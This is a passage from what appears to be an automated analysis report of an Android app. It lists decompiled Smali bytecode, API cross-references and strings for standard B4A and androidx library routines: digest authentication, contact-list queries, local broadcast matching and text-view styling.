                        263invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        265const-string v1, "cnonce"
                        266const/4 v6, 0x1
                        268invoke-direct {v0, v1, v7, v6}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->param(Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;
                        269move-result-object v1
                        271invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        273invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        274goto/16 :goto_173
                        275cond_172: const/4 v6, 0x1
                        276goto_173:
                        277const-string v1, "response"
                        279invoke-direct {v0, v1, v3, v6}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->param(Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;
                        280move-result-object v1
                        282invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        284const-string v1, "opaque"
                        285move-object/from16 v7, p1
                        287invoke-virtual {v7, v1}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        288move-result-object v2
                        289check-cast v2, Ljava/lang/String;
                        290if-eqz v2, :cond_192
                        292invoke-virtual {v5, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        294invoke-direct {v0, v1, v2, v6}, Lanywheresoftware/b4h/okhttp/OkHttpClientWrapper$B4AAuthenticator;->param(Ljava/lang/String;Ljava/lang/String;Z)Ljava/lang/String;
                        295move-result-object v1
                        297invoke-virtual {v5, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        298cond_192:
                        299invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        300move-result-object v1
                        301return-object v1
                        302catch_197: new-instance v1, Ljava/lang/RuntimeException;
                        304invoke-direct {v1}, Ljava/lang/RuntimeException;-><init>()V
                        305throw v1
                        306cond_19d: move-object v7, v5
                        307const/4 v6, 0x1
                        309invoke-virtual {v4, v6}, Ljava/util/regex/Matcher;->group(I)Ljava/lang/String;
                        310move-result-object v5
                        311const/4 v6, 0x2
                        313invoke-virtual {v4, v6}, Ljava/util/regex/Matcher;->group(I)Ljava/lang/String;
                        314move-result-object v6
                        316invoke-virtual {v7, v5, v6}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        317move-object v5, v7
                        318goto/16 :goto_2d
                        Cross References
                        APIs
                        • android.app.Application.getContentResolver
                        • android.provider.ContactsContract$Contacts.CONTENT_URI:Landroid/net/Uri
                        • android.content.ContentResolver.query
                        • java.util.HashMap.<init>
                        • android.database.Cursor.getColumnCount
                        • android.database.Cursor.moveToNext
                        • android.database.Cursor.close
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • android.database.Cursor.getInt
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • android.database.Cursor.getInt
                        • android.app.Application.getContentResolver
                        • android.provider.ContactsContract$CommonDataKinds$Phone.CONTENT_URI:Landroid/net/Uri
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.ContentResolver.query
                        • android.database.Cursor.moveToNext
                        • android.database.Cursor.getColumnIndex
                        • android.database.Cursor.getString
                        • android.database.Cursor.getColumnIndex
                        • android.database.Cursor.getInt
                        • android.database.Cursor.close
                        • android.app.Application.getContentResolver
                        • android.provider.ContactsContract$Data.CONTENT_URI:Landroid/net/Uri
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.ContentResolver.query
                        • android.database.Cursor.moveToNext
                        • android.database.Cursor.close
                        • android.database.Cursor.getString
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • android.database.Cursor.getString
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • android.database.Cursor.getInt
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • android.database.Cursor.getInt
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • android.database.Cursor.getLong
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • android.database.Cursor.getString
                        • java.util.HashMap.get
                        • java.lang.Integer.intValue
                        • android.database.Cursor.getInt
                        • android.database.Cursor.getColumnName
                        • java.lang.Integer.valueOf
                        • java.util.HashMap.put
                        Strings
                        • _id
                        • contact_id =
                        • data1
                        • has_phone_number
                        • is_primary
                        • AND
                        • mimetype
                        • = ?
                        • vnd.android.cursor.item/note
                        • display_name
                        • starred
                        • times_contacted
                        • last_time_contacted
                        • photo_id
                        Position Instruction Meta Information
                        1sget-object v0, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        3invoke-virtual {v0}, Landroid/app/Application;->getContentResolver()Landroid/content/ContentResolver;
                        4move-result-object v1
                        6sget-object v2, Landroid/provider/ContactsContract$Contacts;->CONTENT_URI:Landroid/net/Uri;
                        8sget-object v3, Lanywheresoftware/b4a/phone/Contacts2Wrapper;->people_projection:[Ljava/lang/String;
                        9const/4 v6, 0x0
                        10move-object/from16 v4, p1
                        11move-object/from16 v5, p2
                        13invoke-virtual/range {v1 .. v6}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
                        14move-result-object v0
                        15new-instance v1, Lanywheresoftware/b4a/objects/collections/List;
                        17invoke-direct {v1}, Lanywheresoftware/b4a/objects/collections/List;-><init>()V
                        19invoke-virtual {v1}, Lanywheresoftware/b4a/objects/collections/List;->Initialize()V
                        20new-instance v2, Ljava/util/HashMap;
                        22invoke-direct {v2}, Ljava/util/HashMap;-><init>()V
                        23const/4 v3, 0x0
                        24const/4 v4, 0x0
                        25goto_22:
                        26invoke-interface {v0}, Landroid/database/Cursor;->getColumnCount()I
                        27move-result v5
                        28if-lt v4, v5, :cond_14d
                        29goto_28:
                        30invoke-interface {v0}, Landroid/database/Cursor;->moveToNext()Z
                        31move-result v4
                        32if-nez v4, :cond_32
                        34invoke-interface {v0}, Landroid/database/Cursor;->close()V
                        35return-object v1
                        36cond_32:
                        37const-string v4, "_id"
                        39invoke-virtual {v2, v4}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        40move-result-object v4
                        41check-cast v4, Ljava/lang/Integer;
                        43invoke-virtual {v4}, Ljava/lang/Integer;->intValue()I
                        44move-result v4
                        46invoke-interface {v0, v4}, Landroid/database/Cursor;->getInt(I)I
                        47move-result v9
                        49const-string v4, "contact_id = "
                        51const-string v5, "data1"
                        53const-string v6, ""
                        54if-eqz p3, :cond_99
                        56const-string v7, "has_phone_number"
                        58invoke-virtual {v2, v7}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        59move-result-object v7
                        60check-cast v7, Ljava/lang/Integer;
                        62invoke-virtual {v7}, Ljava/lang/Integer;->intValue()I
                        63move-result v7
                        65invoke-interface {v0, v7}, Landroid/database/Cursor;->getInt(I)I
                        66move-result v7
                        67if-eqz v7, :cond_99
                        69sget-object v7, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        71invoke-virtual {v7}, Landroid/app/Application;->getContentResolver()Landroid/content/ContentResolver;
                        72move-result-object v10
                        74sget-object v11, Landroid/provider/ContactsContract$CommonDataKinds$Phone;->CONTENT_URI:Landroid/net/Uri;
                        76sget-object v12, Lanywheresoftware/b4a/phone/Contacts2Wrapper;->phone_projection:[Ljava/lang/String;
                        77new-instance v7, Ljava/lang/StringBuilder;
                        79invoke-direct {v7, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        81invoke-virtual {v7, v9}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        83invoke-virtual {v7}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        84move-result-object v13
                        85const/4 v14, 0x0
                        86const/4 v15, 0x0
                        88invoke-virtual/range {v10 .. v15}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
                        89move-result-object v7
                        90move-object v8, v6
                        91cond_79:
                        92invoke-interface {v7}, Landroid/database/Cursor;->moveToNext()Z
                        93move-result v10
                        94if-nez v10, :cond_80
                        95goto/16 :goto_94
                        96cond_80:
                        97invoke-interface {v7, v5}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
                        98move-result v8
                        100invoke-interface {v7, v8}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
                        101move-result-object v8
                        103const-string v10, "is_primary"
                        105invoke-interface {v7, v10}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
                        106move-result v10
                        108invoke-interface {v7, v10}, Landroid/database/Cursor;->getInt(I)I
                        109move-result v10
                        110if-eqz v10, :cond_79
                        111goto_94:
                        112invoke-interface {v7}, Landroid/database/Cursor;->close()V
                        113move-object v7, v8
                        114goto/16 :goto_9a
                        115cond_99: move-object v7, v6
                        116goto_9a: const/4 v8, 0x1
                        117if-eqz p4, :cond_df
                        119sget-object v10, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        121invoke-virtual {v10}, Landroid/app/Application;->getContentResolver()Landroid/content/ContentResolver;
                        122move-result-object v11
                        124sget-object v12, Landroid/provider/ContactsContract$Data;->CONTENT_URI:Landroid/net/Uri;
                        125new-array v13, v8, [Ljava/lang/String;
                        126aput-object v5, v13, v3
                        127new-instance v5, Ljava/lang/StringBuilder;
                        129invoke-direct {v5, v4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        131invoke-virtual {v5, v9}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        133const-string v4, " AND "
                        135invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        137const-string v4, "mimetype"
                        139invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        141const-string v4, " = ?"
                        143invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        145invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        146move-result-object v14
                        147new-array v15, v8, [Ljava/lang/String;
                        149const-string v4, "vnd.android.cursor.item/note"
                        150aput-object v4, v15, v3
                        151const/16 v16, 0x0
                        153invoke-virtual/range {v11 .. v16}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
                        154move-result-object v4
                        155goto_d0:
                        156invoke-interface {v4}, Landroid/database/Cursor;->moveToNext()Z
                        157move-result v5
                        158if-nez v5, :cond_da
                        160invoke-interface {v4}, Landroid/database/Cursor;->close()V
                        161goto/16 :goto_df
                        162cond_da:
                        163invoke-interface {v4, v3}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
                        164move-result-object v6
                        165goto/16 :goto_d0
                        166goto_df: move-object v10, v6
                        167new-instance v4, Lanywheresoftware/b4a/phone/Contacts2Wrapper$Contact2;
                        169const-string v5, "display_name"
                        171invoke-virtual {v2, v5}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        172move-result-object v6
                        173check-cast v6, Ljava/lang/Integer;
                        175invoke-virtual {v6}, Ljava/lang/Integer;->intValue()I
                        176move-result v6
                        178invoke-interface {v0, v6}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
                        179move-result-object v6
                        181const-string v11, "starred"
                        183invoke-virtual {v2, v11}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        184move-result-object v11
                        185check-cast v11, Ljava/lang/Integer;
                        187invoke-virtual {v11}, Ljava/lang/Integer;->intValue()I
                        188move-result v11
                        190invoke-interface {v0, v11}, Landroid/database/Cursor;->getInt(I)I
                        191move-result v11
                        192if-lez v11, :cond_105
                        193goto/16 :goto_106
                        194cond_105: const/4 v8, 0x0
                        195goto_106:
                        196const-string v11, "times_contacted"
                        198invoke-virtual {v2, v11}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        199move-result-object v11
                        200check-cast v11, Ljava/lang/Integer;
                        202invoke-virtual {v11}, Ljava/lang/Integer;->intValue()I
                        203move-result v11
                        205invoke-interface {v0, v11}, Landroid/database/Cursor;->getInt(I)I
                        206move-result v11
                        208const-string v12, "last_time_contacted"
                        210invoke-virtual {v2, v12}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        211move-result-object v12
                        212check-cast v12, Ljava/lang/Integer;
                        214invoke-virtual {v12}, Ljava/lang/Integer;->intValue()I
                        215move-result v12
                        217invoke-interface {v0, v12}, Landroid/database/Cursor;->getLong(I)J
                        218move-result-wide v12
                        220invoke-virtual {v2, v5}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        221move-result-object v5
                        222check-cast v5, Ljava/lang/Integer;
                        224invoke-virtual {v5}, Ljava/lang/Integer;->intValue()I
                        225move-result v5
                        227invoke-interface {v0, v5}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
                        228move-result-object v14
                        230const-string v5, "photo_id"
                        232invoke-virtual {v2, v5}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        233move-result-object v5
                        234check-cast v5, Ljava/lang/Integer;
                        236invoke-virtual {v5}, Ljava/lang/Integer;->intValue()I
                        237move-result v5
                        239invoke-interface {v0, v5}, Landroid/database/Cursor;->getInt(I)I
                        240move-result v15
                        241move-object v5, v4
                        243invoke-direct/range {v5 .. v15}, Lanywheresoftware/b4a/phone/Contacts2Wrapper$Contact2;-><init>(Ljava/lang/String;Ljava/lang/String;ZILjava/lang/String;IJLjava/lang/String;I)V
                        245invoke-virtual {v1, v4}, Lanywheresoftware/b4a/objects/collections/List;->Add(Ljava/lang/Object;)V
                        246goto/16 :goto_28
                        247cond_14d:
                        248invoke-interface {v0, v4}, Landroid/database/Cursor;->getColumnName(I)Ljava/lang/String;
                        249move-result-object v5
                        251invoke-static {v4}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        252move-result-object v6
                        254invoke-virtual {v2, v5, v6}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        255add-int/lit8 v4, v4, 0x1
                        256goto/16 :goto_22
                        Cross References
                        APIs
                        • android.content.Intent.getAction
                        • android.content.Context.getContentResolver
                        • android.content.Intent.resolveTypeIfNeeded
                        • android.content.Intent.getData
                        • android.content.Intent.getScheme
                        • android.content.Intent.getCategories
                        • android.content.Intent.getFlags
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        • android.content.Intent.getAction
                        • java.util.HashMap.get
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        • java.util.ArrayList.size
                        • java.util.ArrayList.get
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        • android.util.Log.v
                        • android.content.IntentFilter.match
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Integer.toHexString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        • java.util.ArrayList.<init>
                        • java.util.ArrayList.add
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.util.Log.v
                        • java.util.ArrayList.size
                        • java.util.ArrayList.get
                        • java.util.ArrayList.add
                        • android.os.Handler.hasMessages
                        • android.os.Handler.sendEmptyMessage
                        Strings
                        • LocalBroadcastManager
                        • Resolving type
                        • scheme
                        • of intent
                        • Action list:
                        • Matching against filter
                        • Filter\'s target already added
                        • Filter matched! match=0x
                        • unknown reason
                        • type
                        • data
                        • action
                        • category
                        • Filter did not match:
                        Position Instruction Meta Information
                        0move-object/from16 v1, p0
                        1move-object/from16 v0, p1
                        3iget-object v2, v1, Landroidx/localbroadcastmanager/content/LocalBroadcastManager;->mReceivers:Ljava/util/HashMap;
                        4monitor-enter v2
                        5try_start_7:
                        6invoke-virtual/range {p1 .. p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
                        7move-result-object v10
                        9iget-object v3, v1, Landroidx/localbroadcastmanager/content/LocalBroadcastManager;->mAppContext:Landroid/content/Context;
                        11invoke-virtual {v3}, Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;
                        12move-result-object v3
                        14invoke-virtual {v0, v3}, Landroid/content/Intent;->resolveTypeIfNeeded(Landroid/content/ContentResolver;)Ljava/lang/String;
                        15move-result-object v11
                        17invoke-virtual/range {p1 .. p1}, Landroid/content/Intent;->getData()Landroid/net/Uri;
                        18move-result-object v12
                        20invoke-virtual/range {p1 .. p1}, Landroid/content/Intent;->getScheme()Ljava/lang/String;
                        21move-result-object v13
                        23invoke-virtual/range {p1 .. p1}, Landroid/content/Intent;->getCategories()Ljava/util/Set;
                        24move-result-object v14
                        26invoke-virtual/range {p1 .. p1}, Landroid/content/Intent;->getFlags()I
                        27move-result v3
                        28and-int/lit8 v3, v3, 0x8
                        29if-eqz v3, :cond_2c
                        30const/16 v16, 0x1
                        31goto/16 :goto_2e
                        32cond_2c: const/16 v16, 0x0
                        33goto_2e: if-eqz v16, :cond_56
                        35const-string v3, "LocalBroadcastManager"
                        36new-instance v4, Ljava/lang/StringBuilder;
                        38invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        40const-string v5, "Resolving type "
                        42invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        44invoke-virtual {v4, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        46const-string v5, " scheme "
                        48invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        50invoke-virtual {v4, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        52const-string v5, " of intent "
                        54invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        56invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        58invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        59move-result-object v4
                        61invoke-static {v3, v4}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        62cond_56:
                        63iget-object v3, v1, Landroidx/localbroadcastmanager/content/LocalBroadcastManager;->mActions:Ljava/util/HashMap;
                        65invoke-virtual/range {p1 .. p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
                        66move-result-object v4
                        68invoke-virtual {v3, v4}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        69move-result-object v3
                        70move-object v8, v3
                        71check-cast v8, Ljava/util/ArrayList;
                        72if-eqz v8, :cond_172
                        73if-eqz v16, :cond_7d
                        75const-string v3, "LocalBroadcastManager"
                        76new-instance v4, Ljava/lang/StringBuilder;
                        78invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        80const-string v5, "Action list: "
                        82invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        84invoke-virtual {v4, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        86invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        87move-result-object v4
                        89invoke-static {v3, v4}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        90cond_7d: const/4 v3, 0x0
                        91move-object v7, v3
                        92const/4 v6, 0x0
                        93goto_80:
                        94invoke-virtual {v8}, Ljava/util/ArrayList;->size()I
                        95move-result v3
                        96if-ge v6, v3, :cond_142
                        98invoke-virtual {v8, v6}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        99move-result-object v3
                        100move-object v5, v3
                        101check-cast v5, Landroidx/localbroadcastmanager/content/LocalBroadcastManager$ReceiverRecord;
                        102if-eqz v16, :cond_a7
                        104const-string v3, "LocalBroadcastManager"
                        105new-instance v4, Ljava/lang/StringBuilder;
                        107invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        109const-string v9, "Matching against filter "
                        111invoke-virtual {v4, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        113iget-object v9, v5, Landroidx/localbroadcastmanager/content/LocalBroadcastManager$ReceiverRecord;->filter:Landroid/content/IntentFilter;
                        115invoke-virtual {v4, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        117invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        118move-result-object v4
                        120invoke-static {v3, v4}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        121cond_a7: iget-boolean v3, v5, Landroidx/localbroadcastmanager/content/LocalBroadcastManager$ReceiverRecord;->broadcasting:Z
                        122if-eqz v3, :cond_c0
                        123if-eqz v16, :cond_b4
                        125const-string v3, "LocalBroadcastManager"
                        127const-string v4, " Filter\'s target already added"
                        129invoke-static {v3, v4}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        130cond_b4: move/from16 v17, v6
                        131move-object/from16 v19, v8
                        132move-object/from16 v18, v10
                        133move-object/from16 v20, v11
                        134const/4 v11, 0x1
                        135move-object v10, v7
                        136goto/16 :goto_137
                        137cond_c0:
                        138iget-object v3, v5, Landroidx/localbroadcastmanager/content/LocalBroadcastManager$ReceiverRecord;->filter:Landroid/content/IntentFilter;
                        140const-string v9, "LocalBroadcastManager"
                        141move-object v4, v10
                        142move-object v15, v5
                        143move-object v5, v11
                        144move/from16 v17, v6
                        145move-object v6, v13
                        146move-object/from16 v18, v10
                        147move-object v10, v7
                        148move-object v7, v12
                        149move-object/from16 v19, v8
                        150move-object v8, v14
                        151move-object/from16 v20, v11
                        152const/4 v11, 0x1
                        154invoke-virtual/range {v3 .. v9}, Landroid/content/IntentFilter;->match(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/net/Uri;Ljava/util/Set;Ljava/lang/String;)I
                        155move-result v3
                        156if-ltz v3, :cond_105
                        157if-eqz v16, :cond_f6
                        159const-string v4, "LocalBroadcastManager"
                        160new-instance v5, Ljava/lang/StringBuilder;
                        162invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        164const-string v6, " Filter matched! match=0x"
                        166invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        168invoke-static {v3}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        169move-result-object v3
                        171invoke-virtual {v5, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        173invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        174move-result-object v3
                        176invoke-static {v4, v3}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        177cond_f6: if-nez v10, :cond_fe
                        178new-instance v7, Ljava/util/ArrayList;
                        180invoke-direct {v7}, Ljava/util/ArrayList;-><init>()V
                        181goto/16 :goto_ff
                        182cond_fe: move-object v7, v10
                        183goto_ff:
                        184invoke-virtual {v7, v15}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
                        185iput-boolean v11, v15, Landroidx/localbroadcastmanager/content/LocalBroadcastManager$ReceiverRecord;->broadcasting:Z
                        186goto/16 :goto_138
                        187cond_105: if-eqz v16, :cond_137
                        188const/4 v4, -0x4
                        189if-eq v3, v4, :cond_11f
                        190const/4 v4, -0x3
                        191if-eq v3, v4, :cond_11c
                        192const/4 v4, -0x2
                        193if-eq v3, v4, :cond_119
                        194const/4 v4, -0x1
                        195if-eq v3, v4, :cond_116
                        197const-string v3, "unknown reason"
                        198goto/16 :goto_121
                        199cond_116:
                        200const-string v3, "type"
                        201goto/16 :goto_121
                        202cond_119:
                        203const-string v3, "data"
                        204goto/16 :goto_121
                        205cond_11c:
                        206const-string v3, "action"
                        207goto/16 :goto_121
                        208cond_11f:
                        209const-string v3, "category"
                        210goto_121:
                        211const-string v4, "LocalBroadcastManager"
                        212new-instance v5, Ljava/lang/StringBuilder;
                        214invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        216const-string v6, " Filter did not match: "
                        218invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        220invoke-virtual {v5, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        222invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        223move-result-object v3
                        225invoke-static {v4, v3}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        226cond_137: move-object v7, v10
                        227goto_138: add-int/lit8 v6, v17, 0x1
                        228move-object/from16 v10, v18
                        229move-object/from16 v8, v19
                        230move-object/from16 v11, v20
                        231goto/16 :goto_80
                        232cond_142: move-object v10, v7
                        233const/4 v11, 0x1
                        234if-eqz v10, :cond_172
                        235const/4 v3, 0x0
                        236goto_147:
                        237invoke-virtual {v10}, Ljava/util/ArrayList;->size()I
                        238move-result v4
                        239if-ge v3, v4, :cond_159
                        241invoke-virtual {v10, v3}, Ljava/util/ArrayList;->get(I)Ljava/lang/Object;
                        242move-result-object v4
                        243check-cast v4, Landroidx/localbroadcastmanager/content/LocalBroadcastManager$ReceiverRecord;
                        244const/4 v5, 0x0
                        245iput-boolean v5, v4, Landroidx/localbroadcastmanager/content/LocalBroadcastManager$ReceiverRecord;->broadcasting:Z
                        246add-int/lit8 v3, v3, 0x1
                        247goto/16 :goto_147
                        248cond_159:
                        249iget-object v3, v1, Landroidx/localbroadcastmanager/content/LocalBroadcastManager;->mPendingBroadcasts:Ljava/util/ArrayList;
                        250new-instance v4, Landroidx/localbroadcastmanager/content/LocalBroadcastManager$BroadcastRecord;
                        252invoke-direct {v4, v0, v10}, Landroidx/localbroadcastmanager/content/LocalBroadcastManager$BroadcastRecord;-><init>(Landroid/content/Intent;Ljava/util/ArrayList;)V
                        254invoke-virtual {v3, v4}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
                        256iget-object v0, v1, Landroidx/localbroadcastmanager/content/LocalBroadcastManager;->mHandler:Landroid/os/Handler;
                        258invoke-virtual {v0, v11}, Landroid/os/Handler;->hasMessages(I)Z
                        259move-result v0
                        260if-nez v0, :cond_170
                        262iget-object v0, v1, Landroidx/localbroadcastmanager/content/LocalBroadcastManager;->mHandler:Landroid/os/Handler;
                        264invoke-virtual {v0, v11}, Landroid/os/Handler;->sendEmptyMessage(I)Z
                        265cond_170: monitor-exit v2
                        266return v11
                        267cond_172: monitor-exit v2
                        268const/4 v0, 0x0
                        269return v0
                        270catchall_175: move-exception v0
                        271monitor-exit v2
                        272try_end_177: goto/16 :goto_179
                        273goto_178: throw v0
                        274goto_179: goto/16 :goto_178
                        Cross References
                        APIs
                        • android.widget.TextView.getTextColors
                        • java.util.Map.get
                        • java.lang.String.contains
                        • java.lang.String.toLowerCase
                        • android.graphics.Typeface.createFromFile
                        • java.lang.String.equals
                        • java.util.Map.get
                        • java.util.Map.put
                        • java.lang.String.equals
                        • java.util.Map.get
                        • java.util.Map.put
                        • java.lang.Class.getField
                        • java.lang.reflect.Field.get
                        • java.util.Map.get
                        • android.widget.TextView.setText
                        • java.util.Map.get
                        • java.lang.Class.getField
                        • java.lang.reflect.Field.get
                        • java.lang.Integer.intValue
                        • java.util.Map.get
                        • java.lang.Float.floatValue
                        • android.widget.TextView.setTextSize
                        • android.widget.TextView.setTypeface
                        • java.util.Map.get
                        • java.lang.Class.getField
                        • java.lang.reflect.Field.get
                        • java.lang.Integer.intValue
                        • java.util.Map.get
                        • java.lang.Class.getField
                        • java.lang.reflect.Field.get
                        • java.lang.Integer.intValue
                        • android.widget.TextView.setGravity
                        • java.util.Map.get
                        • java.lang.Integer.intValue
                        • android.widget.TextView.setTextColor
                        • android.widget.TextView.setTextColor
                        • java.util.Map.get
                        • java.lang.Boolean.valueOf
                        • java.lang.Boolean.booleanValue
                        • android.widget.TextView.setSingleLine
                        • java.lang.String.equals
                        • android.text.TextUtils$TruncateAt.valueOf
                        • android.widget.TextView.setEllipsize
                        • android.widget.TextView.setEllipsize
                        Strings
                        • textColor
                        • typeface
                        • .
                        • text
                        • FontAwesome
